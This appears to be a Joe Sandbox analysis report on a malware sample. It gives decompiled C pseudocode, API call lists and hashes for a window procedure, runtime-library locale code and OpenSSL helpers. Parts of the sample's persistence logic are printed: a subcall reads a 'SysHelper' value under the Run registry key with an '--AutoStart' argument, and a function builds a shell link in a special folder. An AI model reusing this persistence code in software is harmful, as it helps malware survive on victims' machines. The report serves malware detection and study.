							_t215 = _t213 + 8;
							__eflags =  &_v2436 - _t194;
							if( &_v2436 != _t194) {
								__eflags = 0;
								_v2412 = 7;
								_v2416 = 0;
								_v2432 = 0;
								E004145A0( &_v2432, _t194);
							}
							__eflags = _v2352 - 8;
							if(_v2352 >= 8) {
								L00422587(_v2372);
								_t215 = _t215 + 4;
							}
							_v2352 = 7;
							_v8 = 0;
							__eflags = _v2328 - 8;
							_v2356 = 0;
							_v2372 = 0;
							if(_v2328 >= 8) {
								L00422587(_v2348);
								_t215 = _t215 + 4;
							}
							_v2328 = 7;
							_v2332 = 0;
							_v2348 = 0;
							E00420BED(_t205);
							_t206 =  *0x529240; // 0x0
							_t170 = 0;
							_t216 = _t215 + 4;
							_v2440 = 0;
							__eflags = _t206 -  *0x529244; // 0x0
							if(__eflags == 0) {
								L37:
								_t195 = _a4;
								_t208 =  *((intOrPtr*)( *0x513268));
								_t117 = IsWindow(_t195);
								__eflags = _t117;
								if(_t117 != 0) {
									__eflags =  *(_t208 + 0x8c8);
									if( *(_t208 + 0x8c8) <= 0) {
										 *0x529224 = 1;
										DestroyWindow(_t195);
									}
								}
							} else {
								_t40 = _t206 + 0x28; // 0x28
								_t161 = _t40;
								do {
									__eflags =  *((intOrPtr*)(_t161 - 0x24)) - 1;
									if( *((intOrPtr*)(_t161 - 0x24)) == 1) {
										__eflags =  *((intOrPtr*)(_t161 - 0x20)) - 3;
										if( *((intOrPtr*)(_t161 - 0x20)) == 3) {
											_t218 = _t216 - 0x18;
											_t171 = _t218;
											_v2436 = _t218;
											_push(0xffffffff);
											 *((intOrPtr*)(_t171 + 0x14)) = 7;
											 *(_t171 + 0x10) = 0;
											 *_t171 = 0;
											E00414690(_t161, _t171,  &_v2432, 0);
											_t219 = _t218 - 0x18;
											_v20 = 2;
											_t172 = _t219;
											_push(0xffffffff);
											 *((intOrPtr*)(_t172 + 0x14)) = 7;
											 *(_t172 + 0x10) = 0;
											 *_t172 = 0;
											E00414690(_t161, _t172, _t161, 0);
											_v32 = 0;
											_t125 = E0040EFF0(0);
											_t216 = _t219 + 0x30;
											__eflags = _t125 - 0xffffffff;
											if(_t125 != 0xffffffff) {
												_t170 = _v2448;
											} else {
												_v2388 = 0;
												_v2384 = 0;
												E0041C330(_t194, _t206,  &_v2388);
												_t128 = E00419D10( &_v2308);
												_v20 = 3;
												E0041C240(_t194, _t206, _t128);
												_v24 = 0;
												E0041B680( &_v2312);
												_t176 =  *0x513268;
												_t131 =  *_t176;
												_t197 =  *((intOrPtr*)(_t176 + 4)) + 8;
												_v2452 =  *((intOrPtr*)(_t176 + 4)) + 8;
												 *((intOrPtr*)(_t131 + 0x8c8)) =  *((intOrPtr*)( *_t176 + 0x8c8)) + 1;
												E0041B8B0(_t161, _t197, _t131 + 8);
												_v2404 = 7;
												_push(0xffffffff);
												_v2408 = 0;
												_v2424 = 0;
												E00414690(_t161,  &_v2424, _t161, 0);
												_v40 = 4;
												_t136 = E0041CE80( &_v2356,  &_v2436, "\\");
												_t216 = _t216 + 4;
												E004131D0(_t197 + 0x8a4, _t136);
												__eflags = _v2340 - 8;
												if(_v2340 >= 8) {
													L00422587(_v2336);
													_t216 = _t216 + 4;
												}
												_v2316 = 7;
												_v20 = 0;
												__eflags = _v2396 - 8;
												_v2320 = 0;
												_v2336 = 0;
												if(_v2396 >= 8) {
													L00422587(_v2416);
													_t216 = _t216 + 4;
												}
												_v2396 = 7;
												_v2416 = 0;
												_t140 =  *0x529228; // 0x8cceb0
												_v2400 = 0;
												_t194 =  *((intOrPtr*)(_t140 + 4)) + 8;
												_t141 = CreateThread(0, 0, E0041F130, _v2448, 0, _t194);
												__eflags = _t141;
												_t194[1] = _t141;
												_t170 =  !=  ? 1 : _v2456 & 0x000000ff;
												_v2456 = _t170;
											}
										}
									}
									_t206 = _t206 + 0x70;
									_t161 = _t161 + 0x70;
									__eflags = _t206 -  *0x529244; // 0x0
								} while (__eflags != 0);
								__eflags = _t170;
								if(_t170 == 0) {
									goto L37;
								}
							}
							__eflags = _v2412 - 8;
							if(_v2412 >= 8) {
								L00422587(_v2432);
							}
							goto L49;
						} else {
							goto L15;
						}
					}
				} else {
					if(_t221 == 0) {
						_t185 =  *0x513268;
						_t151 =  *_t185;
						__eflags = _t151 - _t185;
						if(_t151 == _t185) {
							goto L49;
						} else {
							while(1) {
								__eflags =  *((char*)(_t151 + 0xd));
								if( *((char*)(_t151 + 0xd)) != 0) {
									_t152 = DefWindowProcW(_a4, 0x8001, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t152;
								}
								_t151 =  *_t151;
								__eflags = _t151 - _t185;
								if(_t151 != _t185) {
									continue;
								} else {
									goto L49;
								}
								goto L51;
							}
						}
					} else {
						_t154 = _t164 - 2;
						if(_t154 == 0) {
							PostQuitMessage(0);
							L49:
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							_t155 = _t154 - 0xf;
							if(_t155 == 0) {
								goto L49;
							} else {
								_t156 = _t155 - 5;
								if(_t156 != 0) {
									L15:
									_t150 = DefWindowProcW(_a4, _t164, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t150;
								} else {
									if(_a12 != _t156) {
										E00411CD0(_t158, 0, _t156);
										L47:
										_t203 = _a4;
										if(IsWindow(_t203) != 0) {
											 *0x529224 = 1;
											DestroyWindow(_t203);
										}
									}
									goto L49;
								}
							}
						}
					}
				}
				L51:
			}

0x0041bae3
0x0041baec
0x0041baef
0x0041baf1
0x0041baf6
0x0041baf7
0x0041bafe
0x0041bb04
0x0041bb06
0x0041bb07
0x0041bb0d
0x0041bba2
0x0041bba2
0x0041bba7
0x0041bf3d
0x0041bf43
0x0041bf45
0x0041bf47
0x0041bf5c
0x0041bf5c
0x0041bf63
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf50
0x0041bf50
0x0041bf50
0x0041bf54
0x00000000
0x00000000
0x0041bf56
0x0041bf58
0x0041bf5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf5a
0x0041bf9a
0x0041bfa8
0x0041bfb7
0x0041bfc2
0x0041bfc2
0x0041bbad
0x0041bbad
0x0041bbae
0x0041bbdc
0x0041bbec
0x0041bbf4
0x0041bbfc
0x0041bc04
0x0041bc0c
0x0041bc1a
0x0041bc21
0x0041bc29
0x0041bc3a
0x0041bc3c
0x0041bc43
0x0041bc45
0x0041bc5a
0x0041bc5c
0x0041bc69
0x0041bc71
0x0041bc76
0x0041bc76
0x0041bc7b
0x0041bc80
0x0041bc86
0x0041bc8b
0x0041bc8b
0x0041bc90
0x0041bc98
0x0041bc9f
0x0041bca4
0x0041bcac
0x0041bcb1
0x0041bcb7
0x0041bcbc
0x0041bcbc
0x0041bcc1
0x0041bcca
0x0041bcd2
0x0041bcd7
0x0041bcdc
0x0041bce2
0x0041bce4
0x0041bce7
0x0041bceb
0x0041bcf1
0x0041befb
0x0041bf01
0x0041bf05
0x0041bf07
0x0041bf0d
0x0041bf0f
0x0041bf11
0x0041bf18
0x0041bf1b
0x0041bf22
0x0041bf22
0x0041bf18
0x0041bcf7
0x0041bcf7
0x0041bcf7
0x0041bd00
0x0041bd00
0x0041bd04
0x0041bd0a
0x0041bd0e
0x0041bd14
0x0041bd19
0x0041bd1b
0x0041bd1f
0x0041bd21
0x0041bd28
0x0041bd30
0x0041bd38
0x0041bd3d
0x0041bd40
0x0041bd48
0x0041bd4c
0x0041bd4f
0x0041bd56
0x0041bd5e
0x0041bd61
0x0041bd68
0x0041bd70
0x0041bd75
0x0041bd78
0x0041bd7b
0x0041bee1
0x0041bd81
0x0041bd85
0x0041bd8e
0x0041bd96
0x0041bda2
0x0041bda8
0x0041bdb0
0x0041bdbc
0x0041bdc4
0x0041bdc9
0x0041bdcf
0x0041bdd4
0x0041bdd9
0x0041bddd
0x0041bde7
0x0041bdee
0x0041bdf6
0x0041bdfe
0x0041be06
0x0041be0b
0x0041be19
0x0041be28
0x0041be2d
0x0041be37
0x0041be3c
0x0041be44
0x0041be4d
0x0041be52
0x0041be52
0x0041be57
0x0041be62
0x0041be69
0x0041be6e
0x0041be79
0x0041be81
0x0041be87
0x0041be8c
0x0041be8c
0x0041be91
0x0041be99
0x0041be9e
0x0041bea3
0x0041beae
0x0041bec1
0x0041becb
0x0041becd
0x0041bed8
0x0041bedb
0x0041bedb
0x0041bd7b
0x0041bd0e
0x0041bee5
0x0041bee8
0x0041beeb
0x0041beeb
0x0041bef7
0x0041bef9
0x00000000
0x00000000
0x0041bef9
0x0041bf28
0x0041bf2d
0x0041bf33
0x0041bf38
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bbae
0x0041bb13
0x0041bb13
0x0041bb54
0x0041bb5a
0x0041bb5c
0x0041bb5e
0x00000000
0x00000000
0x0041bb64
0x0041bb64
0x0041bb68
0x0041bb83
0x0041bb90
0x0041bb9d
0x0041bb9d
0x0041bb6a
0x0041bb6c
0x0041bb6e
0x00000000
0x0041bb70
0x00000000
0x0041bb70
0x00000000
0x0041bb6e
0x0041bb64
0x0041bb15
0x0041bb17
0x0041bb1a
0x0041bb49
0x0041bf81
0x0041bf8a
0x0041bf97
0x0041bb1c
0x0041bb1c
0x0041bb1f
0x00000000
0x0041bb25
0x0041bb25
0x0041bb28
0x0041bbb0
0x0041bbba
0x0041bbc7
0x0041bbd4
0x0041bb2e
0x0041bb31
0x0041bb3a
0x0041bf65
0x0041bf65
0x0041bf71
0x0041bf74
0x0041bf7b
0x0041bf7b
0x0041bf71
0x00000000
0x0041bb31
0x0041bb28
0x0041bb1f
0x0041bb1a
0x0041bb13
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32 ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E004295C3(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004242FD(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x507ab0);
					E00428520(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00425007();
						_v36 = _t88;
						E004245DC(0, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00428C96(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00428AF7(0xc);
							_v8 = 1;
							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00425CE3();
							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0042453C(_t83);
								_t43 = E004243E2(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00437413(_a8, 0x50a97c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x510434 = 1;
									}
								}
								E00428AF7(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0042465C(_t25, _t83);
								E0042453C(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x50aba8 & 0x00000001;
									if(( *0x50aba8 & 0x00000001) == 0) {
										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x50aae4; // 0x50aae8
										_t32 = _t77 + 0x84; // 0x50b030
										 *0x50b028 =  *_t32;
										_t33 = _t77 + 0x90; // 0x4d0da8
										 *0x50b084 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x50a978 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00425CF2();
							}
						}
						_v8 = 0xfffffffe;
						E00425D25(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
						E004242D2();
						_t45 = 0;
					}
					return E00428565(_t45);
				}
				L20:
			}

0x00425b6e
0x00425b71
0x00425b74
0x00425b75
0x00425b7a
0x00425b9e
0x00425ba1
0x00425b7c
0x00425b7c
0x00425b7d
0x00425b80
0x00425b80
0x00425b8b
0x00425b90
0x00425b95
0x00000000
0x00000000
0x00425b97
0x00425b9b
0x00000000
0x00425b9d
0x00000000
0x00425b9d
0x00000000
0x00425b9b
0x00425ba2
0x00425ba3
0x00425ba4
0x00425ba5
0x00425ba6
0x00425ba7
0x00425bac
0x00425bad
0x00425baf
0x00425bb4
0x00425bb9
0x00425bbb
0x00425bbe
0x00425bc2
0x00425be0
0x00425be2
0x00425be5
0x00425bea
0x00425bee
0x00425bff
0x00425c01
0x00425c04
0x00425c06
0x00425c0e
0x00425c14
0x00425c1f
0x00425c26
0x00425c2a
0x00425c3e
0x00425c40
0x00425c43
0x00425c45
0x00425cfe
0x00425d04
0x00425c4b
0x00425c4b
0x00425c4f
0x00425c59
0x00425c60
0x00425c62
0x00425c64
0x00425c64
0x00425c62
0x00425c70
0x00425c76
0x00425c7d
0x00425c82
0x00425c88
0x00425c90
0x00425c94
0x00425c96
0x00425c9d
0x00425ca7
0x00425cae
0x00425cb4
0x00425cba
0x00425cbf
0x00425cc5
0x00425cca
0x00425ccd
0x00425ccd
0x00425c9d
0x00425cd2
0x00425cd6
0x00425cd6
0x00425c45
0x00425d0b
0x00425d12
0x00425d17
0x00425bc4
0x00425bc9
0x00425bcf
0x00425bd4
0x00425bd4
0x00425d1e
0x00425d1e
0x00000000

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: e61c58fd63962ed3f5b4d1593b57eb658f03b58a302d0c09fb7b18677bdb7f56
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: e61c58fd63962ed3f5b4d1593b57eb658f03b58a302d0c09fb7b18677bdb7f56
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
				void* _v8;
				void* _v12;
				struct _ITEMIDLIST* _v16;
				char _v20;
				short _v532;
				char* _t30;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t50;
				WCHAR* _t51;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t67;
				void* _t70;

				_t51 = __edx;
				_v8 = 0;
				_v12 = 0;
				__imp__CoInitialize(0, _t67, _t70, _t50);
				_t30 =  &_v8;
				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
				__imp__CoUninitialize();
				if(_t30 >= 0) {
					_t34 = _v8;
					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
					if(_t30 >= 0) {
						_t35 = _v8;
						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
						if(_t30 >= 0) {
							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
							__imp__SHGetPathFromIDListW(_v16,  &_v532);
							lstrcatW( &_v532, "\\");
							lstrcatW( &_v532, _t51);
							_t43 = _v12;
							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
							if(_t30 >= 0) {
								GetSystemDirectoryW( &_v532, 0x100);
								lstrcatW( &_v532, L"\\shell32.dll");
								_t48 = _v8;
								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
								if(_t30 >= 0) {
									_t49 = _v8;
									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
								}
							}
						}
					}
				}
				_t54 = _v12;
				if(_t54 != 0) {
					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				_t55 = _v8;
				if(_t55 == 0) {
					return _t30;
				} else {
					return  *((intOrPtr*)( *_t55 + 8))(_t55);
				}
			}

0x00411b9e
0x00411ba0
0x00411ba9
0x00411bb0
0x00411bb6
0x00411bc8
0x00411bd0
0x00411bd8
0x00411bde
0x00411bed
0x00411bf1
0x00411bf7
0x00411bfe
0x00411c03
0x00411c12
0x00411c22
0x00411c3a
0x00411c44
0x00411c46
0x00411c55
0x00411c5a
0x00411c68
0x00411c7a
0x00411c7c
0x00411c8b
0x00411c90
0x00411c92
0x00411ca8
0x00411ca8
0x00411c90
0x00411c5a
0x00411c03
0x00411bf1
0x00411cab
0x00411cb3
0x00411cb8
0x00411cb8
0x00411cbb
0x00411cc0
0x00411ccb
0x00411cc2
0x00000000
0x00411cc5

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004549A0(void* __ebx) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __edi;
				void* __esi;
				signed int _t21;
				CHAR* _t23;
				void* _t31;
				unsigned int _t34;
				struct HINSTANCE__* _t42;
				void* _t43;
				void* _t52;
				void* _t54;
				void* _t55;
				long _t56;
				signed int _t58;
				void* _t59;

				_t43 = __ebx;
				E0042F7C0(0xc);
				_t21 =  *0x50ad20; // 0x934ff656
				_v8 = _t21 ^ _t58;
				_t23 =  *0x512a94;
				if(_t23 != 0) {
					L12:
					if(_t23 == 0xffffffff) {
						goto L6;
					} else {
						 *_t23();
						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
					}
				} else {
					_t42 = GetModuleHandleA(_t23);
					if(_t42 == 0) {
						_t23 =  *0x512a94;
					} else {
						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
						 *0x512a94 = _t23;
					}
					if(_t23 != 0) {
						goto L12;
					} else {
						 *0x512a94 = 0xffffffff;
						L6:
						GetDesktopWindow();
						_t55 = GetProcessWindowStation();
						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L14;
							} else {
								_t56 = _t56 + 0x00000001 & 0xfffffffe;
								E0043F980(_t56 + 2, _t56);
								_t31 = _t59;
								_v16 = _t31;
								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
									goto L14;
								} else {
									_t47 = _v16;
									_t34 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t34;
									_push(L"Service-0x");
									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
									E00421C02(_v16);
									asm("sbb eax, eax");
									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
								}
							}
						}
					}
				}
			}

0x004549a0
0x004549a8
0x004549ad
0x004549b4
0x004549b7
0x004549c0
0x00454aab
0x00454aae
0x00000000
0x00454ab4
0x00454ab4
0x00454ac8
0x00454ac8
0x004549c6
0x004549c7
0x004549cf
0x004549e4
0x004549d1
0x004549d7
0x004549dd
0x004549dd
0x004549eb
0x00000000
0x004549f1
0x004549f1
0x004549fb
0x004549fb
0x00454a07
0x00454a0b
0x00454ac9
0x00454ade
0x00454a39
0x00454a39
0x00454a42
0x00000000
0x00454a48
0x00454a49
0x00454a52
0x00454a57
0x00454a62
0x00454a6d
0x00000000
0x00454a6f
0x00454a74
0x00454a78
0x00454a7b
0x00454a80
0x00454a86
0x00454a8a
0x00454a94
0x00454aaa
0x00454aaa
0x00454a6d
0x00454a42
0x00454a0b
0x004549eb

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrywindowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
				CHAR* _v0;
				signed int _t17;
				void* _t19;
				void* _t46;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t39 = __ebx;
				E0042F7C0(0x108);
				_t17 =  *0x50ad20; // 0x934ff656
				_a260 = _t17 ^ _t51;
				_t19 = GetStdHandle(0xfffffff4);
				if(_t19 == 0 || GetFileType(_t19) == 0) {
					vswprintf( &_a4, 0xff, _a268,  &_a272);
					_t52 = _t51 + 0x10;
					_a259 = 0;
					if(E004549A0(_t39) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
					} else {
						_t49 = RegisterEventSourceA(0, "OPENSSL");
						_v0 =  &_a4;
						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
						DeregisterEventSource(_t49);
						_t50 = _t48;
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
					}
				} else {
					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
				}
			}

0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae5
0x00454aea
0x00454af1
0x00454afa
0x00454b02
0x00454b5d
0x00454b62
0x00454b65
0x00454b74
0x00454bd3
0x00454bed
0x00454b76
0x00454b86
0x00454b8c
0x00454ba2
0x00454ba9
0x00454baf
0x00454bc4
0x00454bc4
0x00454b0f
0x00454b27
0x00454b43
0x00454b43

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
